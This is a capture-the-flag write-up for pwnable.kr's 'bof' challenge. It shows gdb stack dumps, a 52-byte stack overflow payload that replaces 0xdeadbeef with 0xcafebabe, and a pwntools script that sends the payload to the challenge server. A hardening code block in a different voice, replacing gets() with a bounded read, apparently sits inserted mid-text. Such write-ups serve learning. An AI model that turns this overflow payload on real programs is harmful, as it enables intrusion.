‘bof’ — CTF by pwnable.kr

Dan Elkis
4 min read · May 10, 2020

So, for those of you who don’t know pwnable.kr by now, it’s a CTF website, providing different level challenges including Reverse Engineering, Buffer Overflow exploitations, Shellshock, and basically everything that is Security Research.

So once again we are diving right into our challenge, this time the bof challenge, and once again we are starting right from the first prompt.

Let’s have a look at the bof.c file

It’s not a lot of code, so take a moment to soak it in.

The first thing that comes to mind is the // smash me! comment, which is indeed a hint to where the buffer overflow weakness in the code is.

As can be seen from its man page, the gets function is dangerous and should not be used: it reads until a newline with no idea how large the destination buffer is.
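To make that man-page warning concrete, here is an added example (not the challenge's bof.c and not the author's code) that models the situation this walkthrough is about: a fixed buffer sitting next to the 0xdeadbeef value the program later compares, with the unchecked gets() replaced by a bounded reader. The names struct frame, read_line_bounded and check_key_after_input are assumptions made for this illustration, and the struct is used only so the adjacency is well-defined; in the real binary the value is a function argument in the caller's frame.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed model of the frame the walkthrough inspects: a fixed buffer
 * followed by the value the program compares against 0xcafebabe. A struct is
 * used here only so the adjacency is well-defined and the effect of a bounded
 * read can be checked; it is not the challenge's real stack layout. */
struct frame {
    char buf[32];
    uint32_t key;
};

#define FRAME_KEY_INITIAL 0xdeadbeefu

enum read_status { READ_OK = 0, READ_TRUNCATED = 1 };

/* Bounded replacement for gets(): copy one line from the input cursor into
 * dst[cap], always NUL-terminating and never writing past cap. Bytes beyond
 * cap - 1 are consumed and discarded up to the newline, so they can neither
 * spill into adjacent memory nor be picked up by the next read. */
enum read_status read_line_bounded(char *dst, size_t cap, const char **cursor) {
    const char *p = *cursor;
    size_t n = 0;
    enum read_status st = READ_OK;

    while (*p != '\0' && *p != '\n') {
        if (n + 1 < cap) {
            dst[n++] = *p;          /* fits, keep it */
        } else {
            st = READ_TRUNCATED;    /* would have overflowed: drop the byte */
        }
        p++;
    }
    if (cap > 0) {
        dst[n] = '\0';
    }
    if (*p == '\n') {
        p++;                        /* consume the line terminator */
    }
    *cursor = p;
    return st;
}

/* Hardened counterpart of the challenge's func(): fill the buffer with a
 * bounded read, report whether input had to be truncated, and hand back the
 * key so the caller can confirm it was not touched by the input. */
enum read_status check_key_after_input(const char *input, uint32_t *key_after) {
    struct frame f;
    const char *cur = input;
    enum read_status st;

    memset(f.buf, 0, sizeof f.buf);
    f.key = FRAME_KEY_INITIAL;
    st = read_line_bounded(f.buf, sizeof f.buf, &cur);
    *key_after = f.key;
    return st;
}
```

Feeding 52 filler bytes plus four more through read_line_bounded leaves key at 0xdeadbeef and returns READ_TRUNCATED; that return value is the signal a hardened program should log or reject rather than silently accept, since silent truncation still hides the fact that someone sent more than the protocol allows.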

So we will generate some spam using python

python2.7 -c "print '\x88' * 400" > /tmp/p

and we will use gdb to break at the cmp instruction, so we can mess around with memory.

→ 0x5655564b <func+62> cmp DWORD PTR [ebp+0x8], 0xcafebabe

We run the code with our input gef➤ run < /tmp/p and we immediately see a snapshot of the memory:

0x00007fffffffdd90│+0x0000: 0x0000000000000009  ← $rsp
0x00007fffffffdd98│+0x0008: 0xdeadbeeff7dd7660
0x00007fffffffdda0│+0x0010: 0x8888888888888888 ← $rax
0x00007fffffffdda8│+0x0018: 0x8888888888888888
0x00007fffffffddb0│+0x0020: 0x8888888888888888
0x00007fffffffddb8│+0x0028: 0x8888888888888888
0x00007fffffffddc0│+0x0030: 0x8888888888888888
0x00007fffffffddc8│+0x0038: 0x8888888888888888

Obviously (assuming you read the code) we need to make this 0xdeadbeef be equal to 0xcafebabe, and we are writing our values just after it.

When we look at the cmp instruction cmp DWORD PTR [ebp+0x8], 0xcafebabe, we notice it compares the value at ebp+0x8, so let's examine that location in memory:

gef➤  p $ebp+0x8
$2 = (void *) 0xffffcfb0
gef➤ x/20x $2
0xffffcfb0: 0x88888888 0x88888888 0x88888888 0x88888888
0xffffcfc0: 0x88888888 0x88888888 0x88888888 0x88888888
0xffffcfd0: 0x88888888 0x88888888 0x88888888 0x88888888
0xffffcfe0: 0x88888888 0x88888888 0x88888888 0x88888888
0xffffcff0: 0x88888888 0x88888888 0x88888888 0x88888888
gef➤

It's all filled with the \x88 from our python script, so let's try fewer bytes and see where we end up.

We will use python2.7 -c "print '\x88' * 15" > /tmp/p and once again we break on 0x5655564b. Now we examine the stack, using x/50wx $esp:

gef➤  x/50wx $esp
0xffffcf70: 0xffffcfc0 0x00000000 0x00000000 0x88888888
0xffffcf80: 0x88888888 0x88888888 0x00888888 0xf7fb9748
0xffffcf90: 0xf7fb6000 0xf7fb6000 0x00000000 0xb9670e00
0xffffcfa0: 0xf7fb63fc 0x00000000 0xffffcfc8 0x565556b9
0xffffcfb0: 0xdeadbeef 0xffffd074 0xffffd07c 0x565556a7
0xffffcfc0: 0xf7fe59b0 0xffffcfe0 0x00000000 0xf7df9e81
0xffffcfd0: 0xf7fb6000 0xf7fb6000 0x00000000 0xf7df9e81
0xffffcfe0: 0x00000001 0xffffd074 0xffffd07c 0xffffd004
0xffffcff0: 0x00000001 0xffffd074 0xf7fb6000 0xf7fe575a
0xffffd000: 0xffffd070 0x00000000 0xf7fb6000 0x00000000
0xffffd010: 0x00000000 0xcb206af8 0x8b832ce8 0x00000000
0xffffd020: 0x00000000 0x00000000 0x00000040 0xf7ffd024
0xffffd030: 0x00000000 0x00000000

So in order to overwrite the argument 0xdeadbeef, we will need to write:

(1 + 4*3) * 4 = 52 bytes, and then our 0xcafebabe

(We have the first 0x88888888 dword at 0xffffcf7c, then 3 full lines of 4 dwords each from 0xffffcf80 to 0xffffcfaf before we reach 0xdeadbeef at 0xffffcfb0; each dword is 4 bytes long.)

Let’s create a Python script that does so:

python2.7 -c "print '\xff' * 52 + '\xbe\xba\xfe\xca'" > /tmp/p

And try it:

It seems like we successfully wrote cafebabe to our target memory location, so this should be it, right?

So we write a little script:

from pwn import *
conn = remote("pwnable.kr", 9000)
payload = 'A' * 52 + '\xbe\xba\xfe\xca'
conn.sendline(payload)
conn.interactive()

And there we have it:

That’s it! We found the flag! I hope you enjoyed reading this walkthrough of a simple yet beautiful buffer overflow attack, and I hope, as always, that this has inspired you to try and solve some CTFs for yourself! :-)
